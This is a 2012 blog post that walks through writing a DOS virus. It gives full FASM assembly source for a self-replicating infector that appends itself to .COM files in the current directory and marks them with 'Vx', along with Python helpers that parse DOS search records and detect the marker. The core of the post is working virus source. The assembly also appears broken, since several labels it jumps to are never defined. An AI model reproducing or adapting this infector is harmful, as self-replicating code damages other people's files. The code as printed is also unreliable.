Tuesday, August 28, 2012

Writing my First Computer Virus

I write this, in part, as a nod to Herm1t over at VX Heavens, which has recently been shut down by the Ukrainian government. Computer viruses and computer virology are best explored in a safe and controlled environment, and it is our right as researchers to do so. VX Heavens has shared wonderful information for two decades, affecting the industry in positive ways that we'll never see the end of.

Those who know me very well know that one of the primary reasons I learned to write software was to write computer viruses. Those who don't know me as well may mistakenly assume this was for malicious reasons. It was not. It's somewhat of a secret, but there was a time in my life when I was not good with computers at all. If you really want to know why I wanted to write viruses, you'll just have to ask me in person, because it's somewhat of a personal story for me and it's kind of too dumb to get into here.

For the rest of you who don't care, here's a story about the first computer virus I've ever written! To be clear, this is a virus in a stricter definition than the public tends to use. This virus infects COM files (yeah, remember those?) and runs in a fairly confined environment (its current directory). It has no malicious content, with the exception of possibly violating Title 13-2316 paragraphs 2 & 3 (Arizona Title 13-2316), which of course requires it to be occurring without permission. Since I'm writing it and keeping it in a virtual machine, it pretty much means I'm 100% in the clear. So now that the legal stuff is out of the way, let's talk implementation.

The system I am developing on is MS-DOS 6.22. I'll be running it in a virtual machine, the setup of which I leave as an exercise for the dedicated student. For assembling, I will employ the prowess of the Flat Assembler (FASM). This computer virus is heavily based on the TIMID virus described by Dr. Mark Allen Ludwig in his "The Little Black Book of Computer Viruses."

So let's begin. A little theory seems like a good start.

COM files are flat files that are loaded into memory directly. The first byte of the file (offset 0x0000) is loaded at offset 0x100 in memory, and the rest follows upward from there. The 256-byte gap below it holds the Program Segment Prefix (PSP), a throwback to the CP/M operating system. For the particularly curious, Wikipedia has a fairly well-rounded article on the Program Segment Prefix.
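
The file-to-memory mapping described above is plain arithmetic. Here is a minimal Python sketch of it, purely for illustration. The names `PSP_SIZE`, `SEGMENT_SIZE` and `com_memory_offset` are my own and not part of DOS or FASM.

```python
PSP_SIZE = 0x100        # the PSP occupies offsets 0x000-0x0FF of the segment
SEGMENT_SIZE = 0x10000  # a COM program lives in a single 64 KiB segment


def com_memory_offset(file_offset: int) -> int:
    """Map an offset inside a COM file to its offset inside the load segment."""
    if file_offset < 0 or file_offset + PSP_SIZE >= SEGMENT_SIZE:
        raise ValueError("offset does not fit in a single 64 KiB segment")
    return file_offset + PSP_SIZE


if __name__ == "__main__":
    print(hex(com_memory_offset(0x0000)))  # where the first byte of the file lands
    print(hex(com_memory_offset(0x0123)))
```

This is also why the listing further down starts with `org 0x100`: the assembler has to know that every label sits 256 bytes higher in memory than it does in the file.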

Viruses may have several goals and these goals are up to the implementer to choose. For instance, the number 1 priority may be to replicate itself. A reasonable number 2 priority may be to survive. Since I'm really just interested in the fundamentals of virology we'll stick with focusing merely on this number 1 priority - Replication.

The virus has many options for replicating. It may attach itself to the beginning of a file, or to the end, or break itself up and spread itself around in the file (e.g. CIH). Inserting into the start of a COM file is difficult if the program uses any absolute offsets, as the insertion shifts all of them. Breaking the virus up is obviously the most complicated option, though likely one of the best for subverting detection.

Basically, this is my first virus, so we'll stick with the easiest option: inserting the virus at the end of the COM file.

We'll need a few things:

  1. A routine which will identify potential files to infect.
  2. A routine to perform the infection while preserving enough information to reconstruct the original code, so the host continues to execute effectively.
  3. A payload (may be as simple as just a ret). We'll use a print call when infecting, same as TIMID.

A common issue is that the viral code, when attached to the end of a file, will land at a different location in memory for each host. So we cannot rely on too many absolute addresses (with a few exceptions related to the operating system, e.g. the PSP mentioned above). My solution involves determining the current code location and then referencing data members at a fixed offset from there. This is probably the most notable variation from TIMID; the rest is largely the same.

I use various DOS syscalls. One of the most important sets up a temporary Disk Transfer Area (DTA), the buffer into which DOS writes the results of a file search (attributes, size, name) while we look for files to read and write. For the other DOS syscalls, see any INT 21h function reference.
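
To make the DTA less abstract, here is a small Python sketch that decodes the record DOS leaves there after a find-first/find-next call. It is an illustration only. The offsets (attribute byte at 21, 32-bit size at 26, 13-byte ASCIIZ name at 30) are the standard DOS layout and match the `[ebp + 26]` and `[ebp + 30]` accesses in the listing below. The names `DtaEntry`, `parse_dta` and `make_sample_dta` are hypothetical helpers of mine.

```python
import struct
from typing import NamedTuple

DTA_SEARCH_SIZE = 43  # bytes DOS fills in for a find-first/find-next result


class DtaEntry(NamedTuple):
    attributes: int
    size: int
    name: str


def parse_dta(dta: bytes) -> DtaEntry:
    """Decode the attribute, size and name fields of a search-result DTA."""
    if len(dta) < DTA_SEARCH_SIZE:
        raise ValueError("a search-result DTA is at least 43 bytes long")
    attributes = dta[21]                         # offset 0x15: file attributes
    (size,) = struct.unpack_from("<I", dta, 26)  # offset 0x1A: size, little-endian
    raw_name = dta[30:43]                        # offset 0x1E: 8.3 name, NUL-terminated
    name = raw_name.split(b"\x00", 1)[0].decode("ascii")
    return DtaEntry(attributes, size, name)


def make_sample_dta(name: bytes, size: int, attributes: int = 0x20) -> bytes:
    """Build a fake DTA for demonstration; real ones are filled in by DOS."""
    dta = bytearray(DTA_SEARCH_SIZE)
    dta[21] = attributes
    struct.pack_into("<I", dta, 26, size)
    dta[30:30 + len(name)] = name
    return bytes(dta)


if __name__ == "__main__":
    print(parse_dta(make_sample_dta(b"HELLO.COM", 1234)))
```

Note that the assembly only reads a 16-bit word at offset 26. That is enough for COM files, which must fit in one 64 KiB segment.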

;Origin is 0x100 - This is for COM files, which include
; a 256 byte PSP (Program Segment Prefix)
org 0x100

        jmp     near virus        ;Make it look like this file is infected.
                db 'Vx'
        sub     esp, 0x80        ; new DTA space.
        mov     ebp, esp         ; ebp will point to our DTA       
        lea     dx, [esp]        ; address for new DTA
        mov     ah, 0x1A         ; set DTA
        int     0x21             ; syscall, create new DTA space.

        call    get_start        ;
        pop     si               ; pull the return address (IP) from the stack, this is our location.
        sub     si, get_start    ; si is ready to handle offsets to the data section

        call    find_file        ; Find an infectable file.
        jnz     fin              ; Failed to find a file, bail.       
        call    infect           ; Infect the file!        
        push    si               ; Reimage the host bytes
        lea     si, [si+HOST_IMAGE]      
        lea     di, [0x100]      ; Default starting position      
        mov     cx, 0x05         ; Number of bytes to image
        rep     movs  BYTE [di], [si]    ; Copy 5 bytes from *si to *di
        pop     si               ; Restore si

        mov     dx, 0x80            ; reset to use default DTA
        mov     ah, 0x1A            ; set DTA function
        int     0x21                ; syscall

        mov     esp, 0xFFFF         ; 
        mov     ebp, esp            ; Restore the stack

        push    0x100               ; push the "new" return address

;Find infectable files.
        lea     dx, [si + files]        ; searching COM files
        mov     ah, 0x4E                ; search function id
                mov     cl, 0x06        ; attribute mask
                int     0x21            ; syscall
                or      al, al          ; checking success: non-zero return (success)
                jnz     done            ; on failure, no file found we're done.
                call    check_file      ; check if this file is infectable
                jz      done            ; file is infectable, return to main
                mov     ah, 0x4F        ; file was not infectable, search next (function id)
                jmp     ff_loop         ;   --

  ;First we check the size of the file to ensure our virus can fit in it!
        push   dx
        xor     bx, bx                  ; Clear bx, this represents our soon to be file handle.
        mov    ax, [ebp + 26]              ; Value @ DTA + offset to file size
        cmp    ax, 0x05                    ; Make sure it's *at least* 5 bytes
        jl      bad_file                ; File is too small!
        add     ax, end_file - start_file + 0x100       ; End of virus - start of virus + size of PSP
        jc      bad_file                ; File is too big to accommodate this virus.
        mov     ax, 0x3D02              ; Open file with read/write
        lea     dx, [ebp + 30]          ; Default DTA + offset of file name
        int     0x21                    ; open file.       
        jc      bad_file                ; failed to open file?

        mov     bx, ax                  ; Open succeeded, file handle is in bx.
        mov     ah, 0x3F                ; Read file
        mov     cx, 0x05                ; 5 bytes worth
        lea     di, [si + START_IMAGE]  ; load the effective address of the start_image
        mov     dx, di                  ; dx is actually used in the syscall.
        int     0x21                    ; syscall
        jc      bad_file                ; error, and we've already ruled out partial reads (less than 5)

        ;------Ensure the file is not already infected.
        cmp     BYTE [di], 0xE9         ; Check for the jmp near.
        jne     good_file               ; It wasn't, so it's not infected.
        cmp     WORD [di+3], 0x7856     ; Check for 'Vx'
        je      bad_file                ; The file was infected, next file.

                pop     dx              ; Restore registers
                xor     al, al          ; Return status is good
                ret                     ; Return to caller with the file in the DTA.

                or      bx, bx          ; Checking for a file handle
                jz      no_handle       ; no handle to close
                mov     ah, 0x3E        ; close file
                int     0x21            ; syscall - close the file.
                        pop     dx      ; Restore registers
                        mov     al, 0x01; Return status is no file found
                        or      al, al  ; Set flags for status check
                        ret             ; Return to caller with no file found.
;Infect, copy mechanism
        ;At this point the file is still open, the handle is in bx.
        lea     di, [ ebp + 26]         ; size of com file being infected
        mov     ax, [di]
        mov     cx, ax      
        lea     di, [si + START_VIR + 1]; The jmp offset
        sub     cx, 0x03                ; Remove the near jmp size. 
        mov     [di], cx                ; the offset to jmp to

        xor     ax, ax                  ; Seek to start
        mov     cx, ax
        xor     dx, dx
        mov     ah, 0x42            ; start of file
        int     0x21                ; syscall        

        mov     ah, 0x40            ; write to file
        mov     cx, 0x05            ; writing 5 bytes.
        lea     dx, [si + START_VIR]
        int     0x21                ; write file

        xor     ax, ax              ; Seek to end
        mov     cx, ax
        xor     dx, dx
        mov     ax, 0x4202          ; end of file
        int     0x21                ; syscall

        mov     ah, 0x40
        mov     cx, end_file - virus;size of virus
        sub     cx, 0x05            ; Write all but 5 bytes, this will get start_image
        lea     dx, [si + virus]    ; virus beginning        
        int     0x21                ; copy the virus out!

        mov     ah, 0x40            ; do another write to give HOST_IMAGE
        lea     dx, [si + START_IMAGE]  ; to the newly infected file.
        mov     cx, 0x05            ; Just 5 bytes.
        int     0x21                ;

        mov     ah, 0x3E            ;close file
        int     0x21                ;syscall

        push    dx                  ; print infection message
        lea     dx, [si + banner]
        call    print
        pop     dx

;Helper methods, these'll go away in the final product
        push    ax         ; Makes this function non-destructive.
        mov     ah, 0x09   ; Print '$'-terminated string
        int     0x21       ; print whatever is in ds:dx, this is for debugging
        pop     ax         ; Restore registers    
        ret                ; Return to caller
;Data Section
        banner          db 'Catatonic says "Hi!"', 0x0D, 0x0A, 0x24
        files           db '*.COM', 0x00
        START_VIR       db 0xE9, 2 dup(?), 'Vx'
        START_IMAGE     db 0x05 dup(?)
        HOST_IMAGE      db 0xB8, 0x00, 0x4C, 0xCD, 0x21 ; simple exit program.
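
The "already infected" check in the listing (a leading 0xE9 near jmp followed by the bytes 'Vx') can also be run from the outside, which is handy for confirming which files inside the VM carry the marker. Below is a minimal Python sketch under that assumption. `has_marker` and `jump_target` are hypothetical names of mine, and the check is only as reliable as the two-byte marker itself, so it can give false positives on unrelated files.

```python
import struct

JMP_NEAR = 0xE9    # opcode of the 3-byte near jmp (E9 lo hi)
MARKER = b"Vx"     # the two marker bytes that follow the jmp
LOAD_BASE = 0x100  # COM files are loaded just past the 256-byte PSP


def has_marker(image: bytes) -> bool:
    """True if the first five bytes look like 'jmp near ...' followed by 'Vx'."""
    return len(image) >= 5 and image[0] == JMP_NEAR and image[3:5] == MARKER


def jump_target(image: bytes) -> int:
    """In-memory offset that the leading near jmp transfers control to."""
    if len(image) < 3 or image[0] != JMP_NEAR:
        raise ValueError("image does not start with a near jmp")
    (disp,) = struct.unpack_from("<H", image, 1)
    # The displacement is relative to the instruction after the jmp,
    # and 16-bit addresses wrap around within the segment.
    return (LOAD_BASE + 3 + disp) & 0xFFFF


if __name__ == "__main__":
    clean = bytes([0xB8, 0x00, 0x4C, 0xCD, 0x21])  # the plain exit stub from HOST_IMAGE
    marked = bytes([0xE9, 0x02, 0x00]) + MARKER    # a jmp over the marker, then 'Vx'
    print(has_marker(clean), has_marker(marked))
    print(hex(jump_target(marked)))
```

The word compared in the assembly is 0x7856 because x86 is little-endian: 'V' (0x56) sits at offset 3 and 'x' (0x78) at offset 4.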

That's it! Sorry I'm not going more in depth on the specifics. This post is several months old for me now and I figured I'd just push it out instead of breaking it up or reworking it.

I believe this source code is good (if I recall correctly) and here is a screenshot of the results:

Have fun and stay safe!